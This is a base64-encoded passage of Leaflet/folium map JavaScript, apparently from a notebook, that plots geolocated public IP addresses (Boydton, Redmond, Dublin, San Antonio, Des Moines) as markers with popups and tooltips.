WQgU3RhdGVzCiAgICAgICAgICAgICAgICAgPC9kaXY+YCwKICAgICAgICAgICAgICAgIHsic3RpY2t5IjogdHJ1ZX0KICAgICAgICAgICAgKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgbWFya2VyXzcyZjQ1YTE1NTQ0MTQwOTI4N2M4YjQ1N2EyYWI4ZmRmID0gTC5tYXJrZXIoCiAgICAgICAgICAgICAgICBbMzYuNjUzNCwgLTc4LjM3NV0sCiAgICAgICAgICAgICAgICB7fQogICAgICAgICAgICApLmFkZFRvKG1hcF8yM2M2YmZhMGVjZmQ0NjcyOWJkYTQ5MTdlNmYxYzgxYyk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIGljb25fZDE2ZDg2YjQ5ODQ5NDYzNmI4Y2ZhOTkzZWQ2YzYwMGIgPSBMLkF3ZXNvbWVNYXJrZXJzLmljb24oCiAgICAgICAgICAgICAgICB7ImV4dHJhQ2xhc3NlcyI6ICJmYS1yb3RhdGUtMCIsICJpY29uIjogImluZm8tc2lnbiIsICJpY29uQ29sb3IiOiAid2hpdGUiLCAibWFya2VyQ29sb3IiOiAiYmx1ZSIsICJwcmVmaXgiOiAiZ2x5cGhpY29uIn0KICAgICAgICAgICAgKTsKICAgICAgICAgICAgbWFya2VyXzcyZjQ1YTE1NTQ0MTQwOTI4N2M4YjQ1N2EyYWI4ZmRmLnNldEljb24oaWNvbl9kMTZkODZiNDk4NDk0NjM2YjhjZmE5OTNlZDZjNjAwYik7CiAgICAgICAgCiAgICAKICAgICAgICB2YXIgcG9wdXBfNmEzZmRmOWY2YjY5NDI5YjlkZWI4ODgyYzZlMjc5NjcgPSBMLnBvcHVwKHsibWF4V2lkdGgiOiAiMTAwJSJ9KTsKCiAgICAgICAgCiAgICAgICAgICAgIHZhciBodG1sX2NhYTM1MGNhZjFiMzQ4NjJhYTIzYTY5MjllN2JkMzVkID0gJChgPGRpdiBpZD0iaHRtbF9jYWEzNTBjYWYxYjM0ODYyYWEyM2E2OTI5ZTdiZDM1ZCIgc3R5bGU9IndpZHRoOiAxMDAuMCU7IGhlaWdodDogMTAwLjAlOyI+Q291bnRyeUNvZGU9VVMsIENvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMsIFN0YXRlPVZpcmdpbmlhLCBDaXR5PUJveWR0b24sIExvbmdpdHVkZT0tNzguMzc1LCBMYXRpdHVkZT0zNi42NTM0LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiA2NS41NS40NC4xMDg8L2Rpdj5gKVswXTsKICAgICAgICAgICAgcG9wdXBfNmEzZmRmOWY2YjY5NDI5YjlkZWI4ODgyYzZlMjc5Njcuc2V0Q29udGVudChodG1sX2NhYTM1MGNhZjFiMzQ4NjJhYTIzYTY5MjllN2JkMzVkKTsKICAgICAgICAKCiAgICAgICAgbWFya2VyXzcyZjQ1YTE1NTQ0MTQwOTI4N2M4YjQ1N2EyYWI4ZmRmLmJpbmRQb3B1cChwb3B1cF82YTNmZGY5ZjZiNjk0MjliOWRlYjg4ODJjNmUyNzk2NykKICAgICAgICA7CgogICAgICAgIAogICAgCiAgICAKICAgICAgICAgICAgbWFya2VyXzcyZjQ1YTE1NTQ0MTQwOTI4N2M4YjQ1N2EyYWI4ZmRmLmJpbmRUb29sdGlwKAogICAgICAgICAgICAgICAgYDxkaXY+CiAgICAgICAgICAgICAgICAgICAgIEJveWR0b24sIFVuaXRlZCBTdGF0ZXMKICAgICAgICAgICAgICAgICA8L2Rpdj5gLAogICAgICAgICAgICAgICAgeyJzdGlja3kiOiB0cnVlfQogICAgICAgICAgICApOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBtYXJrZXJfMzU1MGI0NDdkYTliNGMxODk3YjM0YmQ5NWMxMmEwOGIgPSBMLm1hcmtlcigKICAgICAgICAgICAgICAgIFs0Ny42NzQyLCAtMTIyLjEyNDNdLAogICAgICAgICAgICAgICAge30KICAgICAgICAgICAgKS5hZGRUbyhtYXBfMjNjNmJmYTBlY2ZkNDY3MjliZGE0OTE3ZTZmMWM4MWMpOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBpY29uX2E2ZmNlZGY3YzE3YjRhMTRiMmQ3ZDQ4NjkzYTYyZWQ1ID0gTC5Bd2Vzb21lTWFya2Vycy5pY29uKAogICAgICAgICAgICAgICAgeyJleHRyYUNsYXNzZXMiOiAiZmEtcm90YXRlLTAiLCAiaWNvbiI6ICJpbmZvLXNpZ24iLCAiaWNvbkNvbG9yIjogIndoaXRlIiwgIm1hcmtlckNvbG9yIjogImJsdWUiLCAicHJlZml4IjogImdseXBoaWNvbiJ9CiAgICAgICAgICAgICk7CiAgICAgICAgICAgIG1hcmtlcl8zNTUwYjQ0N2RhOWI0YzE4OTdiMzRiZDk1YzEyYTA4Yi5zZXRJY29uKGljb25fYTZmY2VkZjdjMTdiNGExNGIyZDdkNDg2OTNhNjJlZDUpOwogICAgICAgIAogICAgCiAgICAgICAgdmFyIHBvcHVwX2FjZThkMWNjNjkwMjRmZDQ5NDljMWMwYWI5NzhiY2U2ID0gTC5wb3B1cCh7Im1heFdpZHRoIjogIjEwMCUifSk7CgogICAgICAgIAogICAgICAgICAgICB2YXIgaHRtbF9hN2Y5MDhiM2UyZjU0NmEzODMyZGNkNGY5NzAxZjBhMCA9ICQoYDxkaXYgaWQ9Imh0bWxfYTdmOTA4YjNlMmY1NDZhMzgzMmRjZDRmOTcwMWYwYTAiIHN0eWxlPSJ3aWR0aDogMTAwLjAlOyBoZWlnaHQ6IDEwMC4wJTsiPkNvdW50cnlDb2RlPVVTLCBDb3VudHJ5TmFtZT1Vbml0ZWQgU3RhdGVzLCBTdGF0ZT1XYXNoaW5ndG9uLCBDaXR5PVJlZG1vbmQsIExvbmdpdHVkZT0tMTIyLjEyNDMsIExhdGl0dWRlPTQ3LjY3NDIsIFR5cGU9Z2VvbG9jYXRpb248YnI+SVA6IDEzMS4xMDcuMTQ3LjIwOTwvZGl2PmApWzBdOwogICAgICAgICAgICBwb3B1cF9hY2U4ZDFjYzY5MDI0ZmQ0OTQ5YzFjMGFiOTc4YmNlNi5zZXRDb250ZW50KGh0bWxfYTdmOTA4YjNlMmY1NDZhMzgzMmRjZDRmOTcwMWYwYTApOwogICAgICAgIAoKICAgICAgICBtYXJrZXJfMzU1MGI0NDdkYTliNGMxODk3YjM0YmQ5NWMxMmEwOGIuYmluZFBvcHVwKHBvcHVwX2FjZThkMWNjNjkwMjRmZDQ5NDljMWMwYWI5NzhiY2U2KQogICAgICAgIDsKCiAgICAgICAgCiAgICAKICAgIAogICAgICAgICAgICBtYXJrZXJfMzU1MGI0NDdkYTliNGMxODk3YjM0YmQ5NWMxMmEwOGIuYmluZFRvb2x0aXAoCiAgICAgICAgICAgICAgICBgPGRpdj4KICAgICAgICAgICAgICAgICAgICAgUmVkbW9uZCwgVW5pdGVkIFN0YXRlcwogICAgICAgICAgICAgICAgIDwvZGl2PmAsCiAgICAgICAgICAgICAgICB7InN0aWNreSI6IHRydWV9CiAgICAgICAgICAgICk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIG1hcmtlcl8xMWMzNmJmZmZlMzE0YmQ0Yjk2ODMxMDdjMjJmNTFhMCA9IEwubWFya2VyKAogICAgICAgICAgICAgICAgWzM4LjcwOTUsIC03OC4xNTM5XSwKICAgICAgICAgICAgICAgIHt9CiAgICAgICAgICAgICkuYWRkVG8obWFwXzIzYzZiZmEwZWNmZDQ2NzI5YmRhNDkxN2U2ZjFjODFjKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgaWNvbl9iNDA0NTExMTQ4MGI0ODM4YTIzYzc2YzExNTliODEwYSA9IEwuQXdlc29tZU1hcmtlcnMuaWNvbigKICAgICAgICAgICAgICAgIHsiZXh0cmFDbGFzc2VzIjogImZhLXJvdGF0ZS0wIiwgImljb24iOiAiaW5mby1zaWduIiwgImljb25Db2xvciI6ICJ3aGl0ZSIsICJtYXJrZXJDb2xvciI6ICJibHVlIiwgInByZWZpeCI6ICJnbHlwaGljb24ifQogICAgICAgICAgICApOwogICAgICAgICAgICBtYXJrZXJfMTFjMzZiZmZmZTMxNGJkNGI5NjgzMTA3YzIyZjUxYTAuc2V0SWNvbihpY29uX2I0MDQ1MTExNDgwYjQ4MzhhMjNjNzZjMTE1OWI4MTBhKTsKICAgICAgICAKICAgIAogICAgICAgIHZhciBwb3B1cF8yNjQwOGZiZGFkYmE0MWMzOTM4OTE5YjZhMjI3ZDkyYSA9IEwucG9wdXAoeyJtYXhXaWR0aCI6ICIxMDAlIn0pOwoKICAgICAgICAKICAgICAgICAgICAgdmFyIGh0bWxfODVjNDAzYjU1NWI0NGY5Y2I0ODRkMDg3NGE0YmE3ZmQgPSAkKGA8ZGl2IGlkPSJodG1sXzg1YzQwM2I1NTViNDRmOWNiNDg0ZDA4NzRhNGJhN2ZkIiBzdHlsZT0id2lkdGg6IDEwMC4wJTsgaGVpZ2h0OiAxMDAuMCU7Ij5Db3VudHJ5Q29kZT1VUywgQ291bnRyeU5hbWU9VW5pdGVkIFN0YXRlcywgU3RhdGU9VmlyZ2luaWEsIENpdHk9V2FzaGluZ3RvbiwgTG9uZ2l0dWRlPS03OC4xNTM5LCBMYXRpdHVkZT0zOC43MDk1LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiAxMy44Mi4xNTIuNDg8L2Rpdj5gKVswXTsKICAgICAgICAgICAgcG9wdXBfMjY0MDhmYmRhZGJhNDFjMzkzODkxOWI2YTIyN2Q5MmEuc2V0Q29udGVudChodG1sXzg1YzQwM2I1NTViNDRmOWNiNDg0ZDA4NzRhNGJhN2ZkKTsKICAgICAgICAKCiAgICAgICAgbWFya2VyXzExYzM2YmZmZmUzMTRiZDRiOTY4MzEwN2MyMmY1MWEwLmJpbmRQb3B1cChwb3B1cF8yNjQwOGZiZGFkYmE0MWMzOTM4OTE5YjZhMjI3ZDkyYSkKICAgICAgICA7CgogICAgICAgIAogICAgCiAgICAKICAgICAgICAgICAgbWFya2VyXzExYzM2YmZmZmUzMTRiZDRiOTY4MzEwN2MyMmY1MWEwLmJpbmRUb29sdGlwKAogICAgICAgICAgICAgICAgYDxkaXY+CiAgICAgICAgICAgICAgICAgICAgIFdhc2hpbmd0b24sIFVuaXRlZCBTdGF0ZXMKICAgICAgICAgICAgICAgICA8L2Rpdj5gLAogICAgICAgICAgICAgICAgeyJzdGlja3kiOiB0cnVlfQogICAgICAgICAgICApOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBtYXJrZXJfNTM3NDU0ZTMwMTc2NDU3ZThiZDFlNTZiNjg0MmY2ZWUgPSBMLm1hcmtlcigKICAgICAgICAgICAgICAgIFs1My4zMzM4LCAtNi4yNDg4XSwKICAgICAgICAgICAgICAgIHt9CiAgICAgICAgICAgICkuYWRkVG8obWFwXzIzYzZiZmEwZWNmZDQ2NzI5YmRhNDkxN2U2ZjFjODFjKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgaWNvbl9hZTRmMDZjYzRjYjY0Y2MzOWQ0YzdhMWI5M2Q1NDI1NiA9IEwuQXdlc29tZU1hcmtlcnMuaWNvbigKICAgICAgICAgICAgICAgIHsiZXh0cmFDbGFzc2VzIjogImZhLXJvdGF0ZS0wIiwgImljb24iOiAiaW5mby1zaWduIiwgImljb25Db2xvciI6ICJ3aGl0ZSIsICJtYXJrZXJDb2xvciI6ICJibHVlIiwgInByZWZpeCI6ICJnbHlwaGljb24ifQogICAgICAgICAgICApOwogICAgICAgICAgICBtYXJrZXJfNTM3NDU0ZTMwMTc2NDU3ZThiZDFlNTZiNjg0MmY2ZWUuc2V0SWNvbihpY29uX2FlNGYwNmNjNGNiNjRjYzM5ZDRjN2ExYjkzZDU0MjU2KTsKICAgICAgICAKICAgIAogICAgICAgIHZhciBwb3B1cF85Yzc2YTFjYTZlN2I0ZmQxOGM4MDRhODM0N2E3M2U0OCA9IEwucG9wdXAoeyJtYXhXaWR0aCI6ICIxMDAlIn0pOwoKICAgICAgICAKICAgICAgICAgICAgdmFyIGh0bWxfZjA5YzRiZWRjYzM0NDQzNGE4MGYyZTc1MzM0MWE3MmMgPSAkKGA8ZGl2IGlkPSJodG1sX2YwOWM0YmVkY2MzNDQ0MzRhODBmMmU3NTMzNDFhNzJjIiBzdHlsZT0id2lkdGg6IDEwMC4wJTsgaGVpZ2h0OiAxMDAuMCU7Ij5Db3VudHJ5Q29kZT1JRSwgQ291bnRyeU5hbWU9SXJlbGFuZCwgU3RhdGU9TGVpbnN0ZXIsIENpdHk9RHVibGluLCBMb25naXR1ZGU9LTYuMjQ4OCwgTGF0aXR1ZGU9NTMuMzMzOCwgVHlwZT1nZW9sb2NhdGlvbjxicj5JUDogNDAuNzcuMjI2LjI1MDwvZGl2PmApWzBdOwogICAgICAgICAgICBwb3B1cF85Yzc2YTFjYTZlN2I0ZmQxOGM4MDRhODM0N2E3M2U0OC5zZXRDb250ZW50KGh0bWxfZjA5YzRiZWRjYzM0NDQzNGE4MGYyZTc1MzM0MWE3MmMpOwogICAgICAgIAoKICAgICAgICBtYXJrZXJfNTM3NDU0ZTMwMTc2NDU3ZThiZDFlNTZiNjg0MmY2ZWUuYmluZFBvcHVwKHBvcHVwXzljNzZhMWNhNmU3YjRmZDE4YzgwNGE4MzQ3YTczZTQ4KQogICAgICAgIDsKCiAgICAgICAgCiAgICAKICAgIAogICAgICAgICAgICBtYXJrZXJfNTM3NDU0ZTMwMTc2NDU3ZThiZDFlNTZiNjg0MmY2ZWUuYmluZFRvb2x0aXAoCiAgICAgICAgICAgICAgICBgPGRpdj4KICAgICAgICAgICAgICAgICAgICAgRHVibGluLCBJcmVsYW5kCiAgICAgICAgICAgICAgICAgPC9kaXY+YCwKICAgICAgICAgICAgICAgIHsic3RpY2t5IjogdHJ1ZX0KICAgICAgICAgICAgKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgbWFya2VyX2FmNGVjNzBjZGQxYzRkN2I5MjgzMzg3YjM1NDNjN2I3ID0gTC5tYXJrZXIoCiAgICAgICAgICAgICAgICBbMjkuNDI0NywgLTk4LjQ5MzVdLAogICAgICAgICAgICAgICAge30KICAgICAgICAgICAgKS5hZGRUbyhtYXBfMjNjNmJmYTBlY2ZkNDY3MjliZGE0OTE3ZTZmMWM4MWMpOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBpY29uX2Q4ODhmODkyZjc0NzRiYjhhNzFmNTViYzVkYjYyNWNjID0gTC5Bd2Vzb21lTWFya2Vycy5pY29uKAogICAgICAgICAgICAgICAgeyJleHRyYUNsYXNzZXMiOiAiZmEtcm90YXRlLTAiLCAiaWNvbiI6ICJpbmZvLXNpZ24iLCAiaWNvbkNvbG9yIjogIndoaXRlIiwgIm1hcmtlckNvbG9yIjogImJsdWUiLCAicHJlZml4IjogImdseXBoaWNvbiJ9CiAgICAgICAgICAgICk7CiAgICAgICAgICAgIG1hcmtlcl9hZjRlYzcwY2RkMWM0ZDdiOTI4MzM4N2IzNTQzYzdiNy5zZXRJY29uKGljb25fZDg4OGY4OTJmNzQ3NGJiOGE3MWY1NWJjNWRiNjI1Y2MpOwogICAgICAgIAogICAgCiAgICAgICAgdmFyIHBvcHVwXzE2Y2MwOTU3N2FlNzRjODE4YWQzZmE5NTBiN2NiNTdiID0gTC5wb3B1cCh7Im1heFdpZHRoIjogIjEwMCUifSk7CgogICAgICAgIAogICAgICAgICAgICB2YXIgaHRtbF80Y2QzNTc4NDYwMWY0ZjA4OTgzZTUwMTcyOWVmODZhYiA9ICQoYDxkaXYgaWQ9Imh0bWxfNGNkMzU3ODQ2MDFmNGYwODk4M2U1MDE3MjllZjg2YWIiIHN0eWxlPSJ3aWR0aDogMTAwLjAlOyBoZWlnaHQ6IDEwMC4wJTsiPkNvdW50cnlDb2RlPVVTLCBDb3VudHJ5TmFtZT1Vbml0ZWQgU3RhdGVzLCBTdGF0ZT1UZXhhcywgQ2l0eT1TYW4gQW50b25pbywgTG9uZ2l0dWRlPS05OC40OTM1LCBMYXRpdHVkZT0yOS40MjQ3LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiAxMy42NS4xMDcuMzI8L2Rpdj5gKVswXTsKICAgICAgICAgICAgcG9wdXBfMTZjYzA5NTc3YWU3NGM4MThhZDNmYTk1MGI3Y2I1N2Iuc2V0Q29udGVudChodG1sXzRjZDM1Nzg0NjAxZjRmMDg5ODNlNTAxNzI5ZWY4NmFiKTsKICAgICAgICAKCiAgICAgICAgbWFya2VyX2FmNGVjNzBjZGQxYzRkN2I5MjgzMzg3YjM1NDNjN2I3LmJpbmRQb3B1cChwb3B1cF8xNmNjMDk1NzdhZTc0YzgxOGFkM2ZhOTUwYjdjYjU3YikKICAgICAgICA7CgogICAgICAgIAogICAgCiAgICAKICAgICAgICAgICAgbWFya2VyX2FmNGVjNzBjZGQxYzRkN2I5MjgzMzg3YjM1NDNjN2I3LmJpbmRUb29sdGlwKAogICAgICAgICAgICAgICAgYDxkaXY+CiAgICAgICAgICAgICAgICAgICAgIFNhbiBBbnRvbmlvLCBVbml0ZWQgU3RhdGVzCiAgICAgICAgICAgICAgICAgPC9kaXY+YCwKICAgICAgICAgICAgICAgIHsic3RpY2t5IjogdHJ1ZX0KICAgICAgICAgICAgKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgbWFya2VyX2YwNDBkZTI2YzM3NDQ1ZmY4YmFjODk5ZTgwYWJhMTVjID0gTC5tYXJrZXIoCiAgICAgICAgICAgICAgICBbNDEuNjAwNiwgLTkzLjYxMTJdLAogICAgICAgICAgICAgICAge30KICAgICAgICAgICAgKS5hZGRUbyhtYXBfMjNjNmJmYTBlY2ZkNDY3MjliZGE0OTE3ZTZmMWM4MWMpOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBpY29uXzM2MWZiYjUwZTlkNzQ0NzFhYTFjOWZkNGEzNWQ4M2RjID0gTC5Bd2Vzb21lTWFya2Vycy5pY29uKAogICAgICAgICAgICAgICAgeyJleHRyYUNsYXNzZXMiOiAiZmEtcm90YXRlLTAiLCAiaWNvbiI6ICJpbmZvLXNpZ24iLCAiaWNvbkNvbG9yIjogIndoaXRlIiwgIm1hcmtlckNvbG9yIjogImJsdWUiLCAicHJlZml4IjogImdseXBoaWNvbiJ9CiAgICAgICAgICAgICk7CiAgICAgICAgICAgIG1hcmtlcl9mMDQwZGUyNmMzNzQ0NWZmOGJhYzg5OWU4MGFiYTE1Yy5zZXRJY29uKGljb25fMzYxZmJiNTBlOWQ3NDQ3MWFhMWM5ZmQ0YTM1ZDgzZGMpOwogICAgICAgIAogICAgCiAgICAgICAgdmFyIHBvcHVwXzBjNjA1Mzg3ZDFmNTQ3ZjZhZjUwMTQyZjI2Y2ZjZjgyID0gTC5wb3B1cCh7Im1heFdpZHRoIjogIjEwMCUifSk7CgogICAgICAgIAogICAgICAgICAgICB2YXIgaHRtbF9hYjFhYWE2NTg3NTE0YmMzYjNkMGE4ODRmMWNjZTFjMCA9ICQoYDxkaXYgaWQ9Imh0bWxfYWIxYWFhNjU4NzUxNGJjM2IzZDBhODg0ZjFjY2UxYzAiIHN0eWxlPSJ3aWR0aDogMTAwLjAlOyBoZWlnaHQ6IDEwMC4wJTsiPkNvdW50cnlDb2RlPVVTLCBDb3VudHJ5TmFtZT1Vbml0ZWQgU3RhdGVzLCBTdGF0ZT1Jb3dhLCBDaXR5PURlcyBNb2luZXMsIExvbmdpdHVkZT0tOTMuNjExMiwgTGF0aXR1ZGU9NDEuNjAwNiwgVHlwZT1nZW9sb2NhdGlvbjxicj5JUDogMTMuNjcuMTQzLjExNzwvZGl2PmApWzBdOwogICAgICAgICAgICBwb3B1cF8wYzYwNTM4N2QxZjU0N2Y2YWY1MDE0MmYyNmNmY2Y4Mi5zZXRDb250ZW50KGh0bWxfYWIxYWFhNjU4NzUxNGJjM2IzZDBhODg0ZjFjY2UxYzApOwogICAgICAgIAoKICAgICAgICBtYXJrZXJfZjA0MGRlMjZjMzc0NDVmZjhiYWM4OTllODBhYmExNWMuYmluZFBvcHVwKHBvcHVwXzBjNjA1Mzg3ZDFmNTQ3ZjZhZjUwMTQyZjI2Y2ZjZjgyKQogICAgICAgIDsKCiAgICAgICAgCiAgICAKICAgIAogICAgICAgICAgICBtYXJrZXJfZjA0MGRlMjZjMzc0NDVmZjhiYWM4OTllODBhYmExNWMuYmluZFRvb2x0aXAoCiAgICAgICAgICAgICAgICBgPGRpdj4KICAgICAgICAgICAgICAgICAgICAgRGVzIE1vaW5lcywgVW5pdGVkIFN0YXRlcwogICAgICAgICAgICAgICAgIDwvZGl2PmAsCiAgICAgICAgICAgICAgICB7InN0aWNreSI6IHRydWV9CiAgICAgICAgICAgICk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIG1hcmtlcl9hMGNlOTk5NTA1M2M0OGUwODcwOTczZTY1YWE0NGZiNCA9IEwubWFya2VyKAogICAgICAgICAgICAgICAgWzQxLjYwMDYsIC05My42MTEyXSwKICAgICAgICAgICAgICAgIHt9CiAgICAgICAgICAgICkuYWRkVG8obWFwXzIzYzZiZmEwZWNmZDQ2NzI5YmRhNDkxN2U2ZjFjODFjKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgaWNvbl9jNTUxYzFmMGY2Y2I0NzhlYjZiYzhkODJlNDM1MDUwOSA9IEwuQXdlc29tZU1hcmtlcnMuaWNvbigKICAgICAgICAgICAgICAgIHsiZXh0cmFDbGFzc2VzIjogImZhLXJvdGF0ZS0wIiwgImljb24iOiAiaW5mby1zaWduIiwgImljb25Db2xvciI6ICJ3aGl0ZSIsICJtYXJrZXJDb2xvciI6ICJibHVlIiwgInByZWZpeCI6ICJnbHlwaGljb24ifQogICAgICAgICAgICApOwogICAgICAgICAgICBtYXJrZXJfYTBjZTk5OTUwNTNjNDhlMDg3MDk3M2U2NWFhNDRmYjQuc2V0SWNvbihpY29uX2M1NTFjMWYwZjZjYjQ3OGViNmJjOGQ4MmU0MzUwNTA5KTsKICAgICAgICAKICAgIAogICAgICAgIHZhciBwb3B1cF83YmNhNTFlYmEwNTY0ZGM3YjA5NzJmODQwYzg1YTQ0NSA9IEwucG9wdXAoeyJtYXhXaWR0aCI6ICIxMDAlIn0pOwoKICAgICAgICAKICAgICAgICAgICAgdmFyIGh0bWxfNDUwNjYyYzE0ZmI5NDY2MGIyZDc2YTg3ZDc2OTBmZWIgPSAkKGA8ZGl2IGlkPSJodG1sXzQ1MDY2MmMxNGZiOTQ2NjBiMmQ3NmE4N2Q3NjkwZmViIiBzdHlsZT0id2lkdGg6IDEwMC4wJTsgaGVpZ2h0OiAxMDAuMCU7Ij5Db3VudHJ5Q29kZT1VUywgQ291bnRyeU5hbWU9VW5pdGVkIFN0YXRlcywgU3RhdGU9SW93YSwgQ2l0eT1EZXMgTW9pbmVzLCBMb25naXR1ZGU9LTkzLjYxMTIsIExhdGl0dWRlPTQxLjYwMDYsIFR5cGU9Z2VvbG9jYXRpb248YnI+SVA6IDUyLjE2NS4xNzAuMTEyPC9kaXY+YClbMF07CiAgICAgICAgICAgIHBvcHVwXzdiY2E1MWViYTA1NjRkYzdiMDk3MmY4NDBjODVhNDQ1LnNldENvbnRlbnQoaHRtbF80NTA2NjJjMTRmYjk0NjYwYjJkNzZhODdkNzY5MGZlYik7CiAgICAgICAgCgogICAgICAgIG1hcmtlcl9hMGNlOTk5NTA1M2M0OGUwODcwOTczZTY1YWE0NGZiNC5iaW5kUG9wdXAocG9wdXBfN2JjYTUxZWJhMDU2NGRjN2IwOTcyZjg0MGM4NWE0NDUpCiAgICAgICAgOwoKICAgICAgICAKICAgIAogICAgCiAgICAgICAgICAgIG1hcmtlcl9hMGNlOTk5NTA1M2M0OGUwODcwOTczZTY1YWE0NGZiNC5iaW5kVG9vbHRpcCgKICAgICAgICAgICAgICAgIGA8ZGl2PgogICAgICAgICAgICAgICAgICAgICBEZXMgTW9pbmVzLCBVbml0ZWQgU3RhdGVzCiAgICAgICAgICAgICAgICAgPC9kaXY+YCwKICAgICAgICAgICAgICAgIHsic3RpY2t5IjogdHJ1ZX0KICAgICAgICAgICAgKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgbWFya2VyXzBlYjdkYWU1NGY2ZTQ3YTdiOWUyNGM4ZjdjMTBjZjhkID0gTC5tYXJrZXIoCiAgICAgICAgICAgICAgICBbNDEuNjAwNiwgLTkzLjYxMTJdLAogICAgICAgICAgICAgICAge30KICAgICAgICAgICAgKS5hZGRUbyhtYXBfMjNjNmJmYTBlY2ZkNDY3MjliZGE0OTE3ZTZmMWM4MWMpOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBpY29uX2U2NjA1Y2M2ODg4MTRlZTM4ZjA1ZGFhYjJlOGQ0MjkyID0gTC5Bd2Vzb21lTWFya2Vycy5pY29uKAogICAgICAgICAgICAgICAgeyJleHRyYUNsYXNzZXMiOiAiZmEtcm90YXRlLTAiLCAiaWNvbiI6ICJpbmZvLXNpZ24iLCAiaWNvbkNvbG9yIjogIndoaXRlIiwgIm1hcmtlckNvbG9yIjogImJsdWUiLCAicHJlZml4IjogImdseXBoaWNvbiJ9CiAgICAgICAgICAgICk7CiAgICAgICAgICAgIG1hcmtlcl8wZWI3ZGFlNTRmNmU0N2E3YjllMjRjOGY3YzEwY2Y4ZC5zZXRJY29uKGljb25fZTY2MDVjYzY4ODgxNGVlMzhmMDVkYWFiMmU4ZDQyOTIpOwogICAgICAgIAogICAgCiAgICAgICAgdmFyIHBvcHVwX2E1ZmNjODJjMmQzZDRlNWM5MDNmMTUyMzU5Yjg5NWQ2ID0gTC5wb3B1cCh7Im1heFdpZHRoIjogIjEwMCUifSk7CgogICAgICAgIAogICAgICAgICAgICB2YXIgaHRtbF9iZGJlM2YzNzBkOWY0Nzk2OGY4ZGY4MmE1NGZhZGRmNSA9ICQoYDxkaXYgaWQ9Imh0bWxfYmRiZTNmMzcwZDlmNDc5NjhmOGRmODJhNTRmYWRkZjUiIHN0eWxlPSJ3aWR0aDogMTAwLjAlOyBoZWlnaHQ6IDEwMC4wJTsiPkNvdW50cnlDb2RlPVVTLCBDb3VudHJ5TmFtZT1Vbml0ZWQgU3RhdGVzLCBTdGF0ZT1Jb3dhLCBDaXR5PURlcyBNb2luZXMsIExvbmdpdHVkZT0tOTMuNjExMiwgTGF0aXR1ZGU9NDEuNjAwNiwgVHlwZT1nZW9sb2NhdGlvbjxicj5JUDogNTIuMTczLjI4LjE3OTwvZGl2PmApWzBdOwogICAgICAgICAgICBwb3B1cF9hNWZjYzgyYzJkM2Q0ZTVjOTAzZjE1MjM1OWI4OTVkNi5zZXRDb250ZW50KGh0bWxfYmRiZTNmMzcwZDlmNDc5NjhmOGRmODJhNTRmYWRkZjUpOwogICAgICAgIAoKICAgICAgICBtYXJrZXJfMGViN2RhZTU0ZjZlNDdhN2I5ZTI0YzhmN2MxMGNmOGQuYmluZFBvcHVwKHBvcHVwX2E1ZmNjODJjMmQzZDRlNWM5MDNmMTUyMzU5Yjg5NWQ2KQogICAgICAgIDsKCiAgICAgICAgCiAgICAKICAgIAogICAgICAgICAgICBtYXJrZXJfMGViN2RhZTU0ZjZlNDdhN2I5ZTI0YzhmN2MxMGNmOGQuYmluZFRvb2x0aXAoCiAgICAgICAgICAgICAgICBgPGRpdj4KICAgICAgICAgICAgICAgICAgICAgRGVzIE1vaW5lcywgVW5pdGVkIFN0YXRlcwogICAgICAgICAgICAgICAgIDwvZGl2PmAsCiAgICAgICAgICAgICAgICB7InN0aWNreSI6IHRydWV9CiAgICAgICAgICAgICk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIG1hcmtlcl82NzAwMzI0YzJmZTQ0YzEyYjc0YjBmN2ZlN2EwYzE2OCA9IEwubWFya2VyKAogICAgICAgICAgICAgICAgWzM4LjcwOTUsIC03OC4xNTM5XSwKICAgICAgICAgICAgICAgIHt9CiAgICAgICAgICAgICkuYWRkVG8obWFwXzIzYzZiZmEwZWNmZDQ2NzI5YmRhNDkxN2U2ZjFjODFjKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgaWNvbl9jMTAxNzlhZWI3ZjY0MWU0YjA1YzY0MDVkOTZlYTQ4NCA9IEwuQXdlc29tZU1hcmtlcnMuaWNvbigKICAgICAgICAgICAgICAgIHsiZXh0cmFDbGFzc2VzIjogImZhLXJvdGF0ZS0wIiwgImljb24iOiAiaW5mby1zaWduIiwgImljb25Db2xvciI6ICJ3aGl0ZSIsICJtYXJrZXJDb2xvciI6ICJibHVlIiwgInByZWZpeCI6ICJnbHlwaGljb24ifQogICAgICAgICAgICApOwogICAgICAgICAgICBtYXJrZXJfNjcwMDMyNGMyZmU0NGMxMmI3NGIwZjdmZTdhMGMxNjguc2V0SWNvbihpY29uX2MxMDE3OWFlYjdmNjQxZTRiMDVjNjQwNWQ5NmVhNDg0KTsKICAgICAgICAKICAgIAogICAgICAgIHZhciBwb3B1cF83MGM1MDM0OWNkMGE0NDhjYTQwZDU5OWViN2YzMDI0NyA9IEwucG9wdXAoeyJtYXhXaWR0aCI6ICIxMDAlIn0pOwoKICAgICAgICAKICAgICAgICAgICAgdmFyIGh0bWxfOTI3ZDMwNDMzNDUyNGI0YmJjYjUwNmYyY2I5NzhlNGEgPSAkKGA8ZGl2IGlkPSJodG1sXzkyN2QzMDQzMzQ1MjRiNGJiY2I1MDZmMmNiOTc4ZTRhIiBzdHlsZT0id2lkdGg6IDEwMC4wJTsgaGVpZ2h0OiAxMDAuMCU7Ij5Db3VudHJ5Q29kZT1VUywgQ291bnRyeU5hbWU